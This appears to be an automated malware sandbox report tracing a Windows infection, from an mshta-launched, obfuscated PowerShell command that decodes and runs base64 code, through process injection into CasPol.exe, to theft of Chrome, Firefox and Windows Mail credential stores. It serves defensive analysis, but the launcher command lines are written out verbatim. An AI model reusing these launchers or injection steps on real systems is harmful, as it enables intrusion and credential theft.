                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,32_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,32_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044D5E9 FindFirstFileExA,32_2_0044D5E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,32_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406AC2 FindFirstFileW,FindNextFileW,32_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,32_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,32_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,32_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,32_2_00406F06
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_00418981 memset,GetSystemInfo,29_2_00418981
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_30-34269
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,29_2_004044A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00442554 mov eax, dword ptr fs:[00000030h]32_2_00442554
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044E92E GetProcessHeap,32_2_0044E92E
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433CD7 SetUnhandledExceptionFilter,32_2_00433CD7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00434168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_0043A65D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00433B44

                  HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 3984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 7EFDE008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00410F36 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 32_2_00418754 mouse_event
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($biscato));invoke-expression $desalinhadamente
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_00433E0A cpuid 32_2_00433E0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_004470AE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_004510BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,32_2_004511E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_004512EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,32_2_004513B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,32_2_00447597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,32_2_0040E679
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,32_2_00450A7F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450CF7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450D42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,32_2_00450DDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,32_2_00450E6A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,29_2_0041881C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 30_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,30_2_004082CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 32_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,32_2_0044800F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 29_2_0041739B GetVersionExW,29_2_0041739B
                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3640, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data32_2_0040B21B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db32_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
